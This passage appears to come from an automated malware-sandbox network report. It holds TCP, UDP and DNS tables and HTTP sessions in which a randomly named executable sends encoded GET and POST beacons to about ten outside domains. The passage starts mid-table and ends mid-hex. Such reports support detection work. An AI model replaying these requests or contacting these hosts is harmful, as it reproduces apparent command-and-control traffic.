Sep 30, 2024 08:32:40.632652044 CEST	80	57416	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:40.636826992 CEST	57416	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:40.645160913 CEST	57416	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:40.649993896 CEST	80	57416	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:42.025532961 CEST	80	57416	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:42.025599003 CEST	57416	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:42.155575991 CEST	57416	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:42.160404921 CEST	80	57416	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:43.176764011 CEST	57417	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:43.181848049 CEST	80	57417	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:43.181941032 CEST	57417	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:43.192790031 CEST	57417	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:43.197685003 CEST	80	57417	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:43.197695017 CEST	80	57417	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:43.197721958 CEST	80	57417	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:43.197730064 CEST	80	57417	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:43.197771072 CEST	80	57417	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:43.197835922 CEST	80	57417	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:43.197844028 CEST	80	57417	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:43.197860003 CEST	80	57417	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:43.197866917 CEST	80	57417	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:43.649736881 CEST	80	57417	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:43.649791956 CEST	57417	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:44.704843044 CEST	57417	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:44.709682941 CEST	80	57417	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:45.721775055 CEST	57418	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:45.726741076 CEST	80	57418	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:45.726815939 CEST	57418	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:45.734958887 CEST	57418	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:45.739994049 CEST	80	57418	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:46.183098078 CEST	80	57418	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:46.183177948 CEST	80	57418	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:46.183409929 CEST	57418	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:46.185797930 CEST	57418	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:46.190530062 CEST	80	57418	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:51.213437080 CEST	57419	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:51.218230009 CEST	80	57419	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:51.218395948 CEST	57419	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:51.229427099 CEST	57419	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:51.234251022 CEST	80	57419	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:52.121453047 CEST	80	57419	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:52.121498108 CEST	80	57419	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:52.121545076 CEST	57419	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:52.733668089 CEST	57419	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:53.752866030 CEST	57420	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:53.759800911 CEST	80	57420	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:53.759871006 CEST	57420	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:53.772381067 CEST	57420	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:53.779346943 CEST	80	57420	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:54.641823053 CEST	80	57420	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:54.641972065 CEST	80	57420	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:54.646775007 CEST	57420	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:55.282777071 CEST	57420	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:56.327347040 CEST	57421	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:56.332314968 CEST	80	57421	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:56.332410097 CEST	57421	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:56.416913033 CEST	57421	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:56.421821117 CEST	80	57421	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:56.421830893 CEST	80	57421	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:56.421864033 CEST	80	57421	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:56.421871901 CEST	80	57421	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:56.421880007 CEST	80	57421	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:56.422141075 CEST	80	57421	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:56.422148943 CEST	80	57421	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:56.422192097 CEST	80	57421	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:56.422199965 CEST	80	57421	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:57.449630022 CEST	80	57421	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:57.449655056 CEST	80	57421	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:57.449770927 CEST	57421	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:57.968091011 CEST	57421	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:58.986807108 CEST	57422	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:58.992515087 CEST	80	57422	8.217.17.192	192.168.2.4
Sep 30, 2024 08:32:58.992633104 CEST	57422	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:59.002780914 CEST	57422	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:32:59.009021044 CEST	80	57422	8.217.17.192	192.168.2.4
Sep 30, 2024 08:33:20.381217003 CEST	80	57422	8.217.17.192	192.168.2.4
Sep 30, 2024 08:33:20.381335974 CEST	57422	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:33:20.382205009 CEST	57422	80	192.168.2.4	8.217.17.192
Sep 30, 2024 08:33:20.386991978 CEST	80	57422	8.217.17.192	192.168.2.4
Sep 30, 2024 08:33:25.493108988 CEST	57423	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:25.498428106 CEST	80	57423	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:25.498682976 CEST	57423	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:25.509095907 CEST	57423	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:25.513886929 CEST	80	57423	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:27.017004967 CEST	57423	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:27.022296906 CEST	80	57423	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:27.022389889 CEST	57423	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:28.034050941 CEST	57424	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:28.038939953 CEST	80	57424	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:28.039015055 CEST	57424	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:28.050031900 CEST	57424	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:28.054821014 CEST	80	57424	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:29.562810898 CEST	57424	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:29.568072081 CEST	80	57424	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:29.570861101 CEST	57424	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:30.580388069 CEST	57425	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:30.585267067 CEST	80	57425	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:30.585345030 CEST	57425	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:30.596189022 CEST	57425	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:30.601311922 CEST	80	57425	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:30.601326942 CEST	80	57425	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:30.601335049 CEST	80	57425	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:30.601339102 CEST	80	57425	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:30.601583004 CEST	80	57425	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:30.601592064 CEST	80	57425	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:30.601599932 CEST	80	57425	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:30.601608038 CEST	80	57425	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:30.601615906 CEST	80	57425	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:32.108704090 CEST	57425	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:32.113826036 CEST	80	57425	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:32.113878012 CEST	57425	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:33.127268076 CEST	57426	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:33.132148981 CEST	80	57426	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:33.132237911 CEST	57426	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:33.138983011 CEST	57426	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:33.144859076 CEST	80	57426	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:33.822935104 CEST	80	57426	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:33.822953939 CEST	80	57426	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:33.823093891 CEST	57426	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:33.869796991 CEST	57426	80	192.168.2.4	85.159.66.93
Sep 30, 2024 08:33:33.874625921 CEST	80	57426	85.159.66.93	192.168.2.4
Sep 30, 2024 08:33:38.894984007 CEST	57427	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:33:38.899794102 CEST	80	57427	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:38.900976896 CEST	57427	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:33:38.913414955 CEST	57427	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:33:38.918236017 CEST	80	57427	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:39.359405041 CEST	80	57427	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:39.359478951 CEST	57427	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:33:40.421178102 CEST	57427	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:33:40.426311970 CEST	80	57427	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:41.439472914 CEST	57428	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:33:41.444417000 CEST	80	57428	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:41.444502115 CEST	57428	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:33:41.453636885 CEST	57428	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:33:41.458442926 CEST	80	57428	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:41.932621956 CEST	80	57428	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:41.932692051 CEST	57428	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:33:43.280885935 CEST	57428	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:33:43.285836935 CEST	80	57428	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:44.300857067 CEST	57429	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:33:44.305810928 CEST	80	57429	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:44.309060097 CEST	57429	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:33:44.318605900 CEST	57429	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:33:44.323612928 CEST	80	57429	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:44.323627949 CEST	80	57429	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:44.323640108 CEST	80	57429	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:44.323652983 CEST	80	57429	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:44.323666096 CEST	80	57429	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:44.323678970 CEST	80	57429	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:44.323702097 CEST	80	57429	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:44.323714972 CEST	80	57429	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:44.323729038 CEST	80	57429	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:44.776966095 CEST	80	57429	13.248.169.48	192.168.2.4
Sep 30, 2024 08:33:44.777085066 CEST	57429	80	192.168.2.4	13.248.169.48

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 08:30:58.119663954 CEST	53	53698	1.1.1.1	192.168.2.4
Sep 30, 2024 08:31:12.246752024 CEST	51845	53	192.168.2.4	1.1.1.1
Sep 30, 2024 08:31:12.258785009 CEST	53	51845	1.1.1.1	192.168.2.4
Sep 30, 2024 08:31:28.377882004 CEST	62888	53	192.168.2.4	1.1.1.1
Sep 30, 2024 08:31:28.443598032 CEST	53	62888	1.1.1.1	192.168.2.4
Sep 30, 2024 08:31:41.720938921 CEST	54461	53	192.168.2.4	1.1.1.1
Sep 30, 2024 08:31:41.749097109 CEST	53	54461	1.1.1.1	192.168.2.4
Sep 30, 2024 08:31:57.814832926 CEST	55195	53	192.168.2.4	1.1.1.1
Sep 30, 2024 08:31:57.854198933 CEST	53	55195	1.1.1.1	192.168.2.4
Sep 30, 2024 08:32:11.410759926 CEST	49620	53	192.168.2.4	1.1.1.1
Sep 30, 2024 08:32:11.538882971 CEST	53	49620	1.1.1.1	192.168.2.4
Sep 30, 2024 08:32:24.799809933 CEST	53298	53	192.168.2.4	1.1.1.1
Sep 30, 2024 08:32:24.812843084 CEST	53	53298	1.1.1.1	192.168.2.4
Sep 30, 2024 08:32:38.035371065 CEST	49299	53	192.168.2.4	1.1.1.1
Sep 30, 2024 08:32:38.068635941 CEST	53	49299	1.1.1.1	192.168.2.4
Sep 30, 2024 08:32:51.190043926 CEST	49403	53	192.168.2.4	1.1.1.1
Sep 30, 2024 08:32:51.203005075 CEST	53	49403	1.1.1.1	192.168.2.4
Sep 30, 2024 08:33:25.393138885 CEST	51402	53	192.168.2.4	1.1.1.1
Sep 30, 2024 08:33:25.487401009 CEST	53	51402	1.1.1.1	192.168.2.4
Sep 30, 2024 08:33:38.881331921 CEST	56850	53	192.168.2.4	1.1.1.1
Sep 30, 2024 08:33:38.891927958 CEST	53	56850	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 30, 2024 08:31:12.246752024 CEST	192.168.2.4	1.1.1.1	0x9c14	Standard query (0)	www.cricketinsights.info	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:31:28.377882004 CEST	192.168.2.4	1.1.1.1	0xd0e0	Standard query (0)	www.itaja.xyz	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:31:41.720938921 CEST	192.168.2.4	1.1.1.1	0x6b76	Standard query (0)	www.coba168.info	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:31:57.814832926 CEST	192.168.2.4	1.1.1.1	0x91f7	Standard query (0)	www.cctv9.rest	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:32:11.410759926 CEST	192.168.2.4	1.1.1.1	0x98c6	Standard query (0)	www.havfabi.life	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:32:24.799809933 CEST	192.168.2.4	1.1.1.1	0xb257	Standard query (0)	www.appointy.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:32:38.035371065 CEST	192.168.2.4	1.1.1.1	0xe64c	Standard query (0)	www.30kfeet.net	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:32:51.190043926 CEST	192.168.2.4	1.1.1.1	0xbed2	Standard query (0)	www.meliorahomes.net	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:33:25.393138885 CEST	192.168.2.4	1.1.1.1	0xc6b6	Standard query (0)	www.restobarbebek.xyz	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:33:38.881331921 CEST	192.168.2.4	1.1.1.1	0xffbe	Standard query (0)	www.mynotebook.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 30, 2024 08:31:12.258785009 CEST	1.1.1.1	192.168.2.4	0x9c14	No error (0)	www.cricketinsights.info	cricketinsights.info		CNAME (Canonical name)	IN (0x0001)	false
Sep 30, 2024 08:31:12.258785009 CEST	1.1.1.1	192.168.2.4	0x9c14	No error (0)	cricketinsights.info		118.139.176.2	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:31:28.443598032 CEST	1.1.1.1	192.168.2.4	0xd0e0	No error (0)	www.itaja.xyz	itaja.xyz		CNAME (Canonical name)	IN (0x0001)	false
Sep 30, 2024 08:31:28.443598032 CEST	1.1.1.1	192.168.2.4	0xd0e0	No error (0)	itaja.xyz		83.229.19.82	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:31:41.749097109 CEST	1.1.1.1	192.168.2.4	0x6b76	No error (0)	www.coba168.info	coba168.info		CNAME (Canonical name)	IN (0x0001)	false
Sep 30, 2024 08:31:41.749097109 CEST	1.1.1.1	192.168.2.4	0x6b76	No error (0)	coba168.info		3.33.130.190	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:31:41.749097109 CEST	1.1.1.1	192.168.2.4	0x6b76	No error (0)	coba168.info		15.197.148.33	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:31:57.854198933 CEST	1.1.1.1	192.168.2.4	0x91f7	No error (0)	www.cctv9.rest		114.134.188.182	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:32:11.538882971 CEST	1.1.1.1	192.168.2.4	0x98c6	No error (0)	www.havfabi.life		162.213.249.216	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:32:24.812843084 CEST	1.1.1.1	192.168.2.4	0xb257	No error (0)	www.appointy.shop		13.248.169.48	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:32:24.812843084 CEST	1.1.1.1	192.168.2.4	0xb257	No error (0)	www.appointy.shop		76.223.54.146	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:32:38.068635941 CEST	1.1.1.1	192.168.2.4	0xe64c	No error (0)	www.30kfeet.net	30kfeet.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 30, 2024 08:32:38.068635941 CEST	1.1.1.1	192.168.2.4	0xe64c	No error (0)	30kfeet.net		3.33.130.190	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:32:38.068635941 CEST	1.1.1.1	192.168.2.4	0xe64c	No error (0)	30kfeet.net		15.197.148.33	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:32:51.203005075 CEST	1.1.1.1	192.168.2.4	0xbed2	No error (0)	www.meliorahomes.net		8.217.17.192	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:33:25.487401009 CEST	1.1.1.1	192.168.2.4	0xc6b6	No error (0)	www.restobarbebek.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 30, 2024 08:33:25.487401009 CEST	1.1.1.1	192.168.2.4	0xc6b6	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 30, 2024 08:33:25.487401009 CEST	1.1.1.1	192.168.2.4	0xc6b6	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:33:38.891927958 CEST	1.1.1.1	192.168.2.4	0xffbe	No error (0)	www.mynotebook.shop		13.248.169.48	A (IP address)	IN (0x0001)	false
Sep 30, 2024 08:33:38.891927958 CEST	1.1.1.1	192.168.2.4	0xffbe	No error (0)	www.mynotebook.shop		76.223.54.146	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.cricketinsights.info

www.itaja.xyz

www.coba168.info

www.cctv9.rest

www.havfabi.life

www.appointy.shop

www.30kfeet.net

www.meliorahomes.net

www.restobarbebek.xyz

www.mynotebook.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	57393	118.139.176.2	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:31:12.296245098 CEST	477	OUT	GET /7r21/?GX4dS=Zcl8OC2U2mZSOodQP89hLxJaF9oxIylC3vQVS5j+kQePBp9DPErvqQJ5GN/fq92ZSua+eOkgWypb4NJRPdpqD2l3+Txvj2dKnJzbedJ/jR6LsqpOy2ysxaE=&QHdD=Mr7PG HTTP/1.1 Host: www.cricketinsights.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Sep 30, 2024 08:31:13.331033945 CEST	518	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 30 Sep 2024 06:31:13 GMT Server: Apache X-Powered-By: PHP/8.2.22 Expires: Mon, 30 Sep 2024 07:31:13 GMT Cache-Control: max-age=3600 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://cricketinsights.info/7r21/?GX4dS=Zcl8OC2U2mZSOodQP89hLxJaF9oxIylC3vQVS5j+kQePBp9DPErvqQJ5GN/fq92ZSua+eOkgWypb4NJRPdpqD2l3+Txvj2dKnJzbedJ/jR6LsqpOy2ysxaE=&QHdD=Mr7PG Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	57394	83.229.19.82	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:31:28.463084936 CEST	729	OUT	POST /piim/ HTTP/1.1 Host: www.itaja.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.itaja.xyz Referer: http://www.itaja.xyz/piim/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 202 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 63 61 45 35 68 54 30 59 38 69 75 35 6f 6f 54 36 39 43 57 63 35 65 48 4a 6f 72 33 6b 54 4c 43 30 56 43 30 55 57 4d 51 32 2b 76 63 33 6f 2f 44 52 6a 36 4f 4e 6d 2b 76 5a 5a 57 63 46 7a 54 35 52 67 74 58 46 73 66 6c 30 5a 6e 6f 2b 47 50 47 47 55 71 74 68 43 67 48 67 4e 44 37 67 75 73 2b 4f 46 47 6f 6e 48 6b 75 68 33 72 65 68 50 74 67 59 70 38 55 38 2b 4f 53 5a 32 62 7a 77 53 63 52 76 4f 4f 63 51 79 4f 4f 71 37 74 44 77 69 36 6d 4c 62 34 61 63 4d 45 72 31 47 79 64 67 7a 49 69 6e 35 7a 41 6e 6e 7a 4d 6c 32 56 34 32 38 71 65 74 4d 77 33 7a 79 43 6f 54 47 46 72 58 33 4e 57 79 4b 67 3d 3d Data Ascii: GX4dS=caE5hT0Y8iu5ooT69CWc5eHJor3kTLC0VC0UWMQ2+vc3o/DRj6ONm+vZZWcFzT5RgtXFsfl0Zno+GPGGUqthCgHgND7gus+OFGonHkuh3rehPtgYp8U8+OSZ2bzwScRvOOcQyOOq7tDwi6mLb4acMEr1GydgzIin5zAnnzMl2V428qetMw3zyCoTGFrX3NWyKg==
Sep 30, 2024 08:31:29.101605892 CEST	1047	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 06:31:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 33 36 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 53 e3 38 10 bd e7 57 f4 f8 c2 25 b6 03 84 29 86 4d 52 35 43 b2 45 aa 98 81 02 4f 4d 71 94 e5 56 ac 45 96 bc 92 8c 93 ad fd 43 9c f7 27 f0 c7 b6 65 25 2c f3 b1 27 47 52 bf f7 ba 5f 77 67 f6 6e 79 73 59 3c dc ae e0 aa f8 7c 0d b7 5f 3f 5d af 2f 21 49 f3 fc db e9 65 9e 2f 8b 65 7c 98 66 93 e3 3c 5f 7d 49 20 a9 bd 6f 2f f2 bc ef fb ac 3f cd 8c dd e4 c5 5d 5e fb 46 4d 73 e7 ad e4 3e ab 7c 95 2c 46 b3 70 07 8a e9 cd 3c 11 76 b8 40 56 d1 7d 83 9e 41 60 49 f1 cf 4e 3e cd 93 4b a3 3d 6a 9f 16 bb 16 13 e0 f1 34 4f 3c 6e fd 40 fc 1b f0 9a 59 87 7e de 79 91 9e 07 aa 81 43 b3 06 e7 89 35 a5 f1 ee 0d 4e 1b 8d 63 6d a4 ae 70 4b 5f 61 94 32 fd 2b e8 ad 30 67 bc c6 34 08 5a a3 be 63 48 87 a7 5f 82 5a cb 36 0d fb 9f e8 62 5d 5c af 16 d3 c9 14 be 18 0f bf 9b 4e 57 b3 3c 5e 8e 66 f9 d5 ea e3 92 92 ff 74 b3 7c a0 cf d5 f1 e2 4d 10 9d 46 45 8d 60 c9 14 74 1e 2b a8 0c ef 1a f2 05 7a e6 40 13 9d 08 74 60 34 f8 5a 3a 70 68 9f d0 66 a3 d9 6d e0 ba 3b 10 6a 28 ac e9 9e 5e [TRUNCATED] Data Ascii: 36cuTMS8W%)MR5CEOMqVEC'e%,'GR_wgnysY<\|_?]/!Ie/e\|f<_}I o/?]^FMs>\|,Fp<v@V}A`IN>K=j4O<n@Y~yC5NcmpK_a2+0g4ZcH_Z6b]\NW<^ft\|MFE`t+z@t`4Z:phfm;j(^I(?gGZ"}ytC<L+=8W3JrR%P@,+nu}Q4\D5=Z2wzye9=aj2))/ON&g {Ui/F4@_0wyT1\|gbUEB4d4&jX!L31,#:6aJ%cp-r)$.EaOn e]H{VND!2P8BYKL~G!#}Z)p&RXEDB9[+:h$"74i-vGKWD]MvfP;rohwugQkzsBD =/<YBpi^TCGCFWIRdn0Fa4\|BI,TLGEWCZ6]o&2Ep{g#?<To}H0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	57395	83.229.19.82	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:31:31.001455069 CEST	749	OUT	POST /piim/ HTTP/1.1 Host: www.itaja.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.itaja.xyz Referer: http://www.itaja.xyz/piim/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 222 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 63 61 45 35 68 54 30 59 38 69 75 35 6f 4a 6a 36 2f 6c 43 63 6f 2b 48 57 74 72 33 6b 4b 62 43 76 56 43 6f 55 57 49 42 39 2b 35 4d 33 76 61 76 52 69 37 4f 4e 31 4f 76 5a 57 32 63 41 33 54 35 59 67 74 62 38 73 62 6c 30 5a 6b 55 2b 47 4f 61 47 58 5a 46 69 42 51 48 75 55 7a 37 69 71 73 2b 4f 46 47 6f 6e 48 6b 4b 4c 33 72 32 68 54 4d 51 59 6d 2b 38 7a 68 2b 53 65 78 62 7a 77 46 4d 51 6d 4f 4f 64 7a 79 50 53 41 37 75 33 77 69 34 4f 4c 62 4b 79 62 5a 30 72 33 62 43 63 33 6a 59 6d 70 78 78 56 30 73 51 59 73 39 52 30 47 39 73 50 33 64 42 57 6b 67 43 4d 67 62 43 69 6a 36 4f 72 37 52 6e 5a 6e 73 30 75 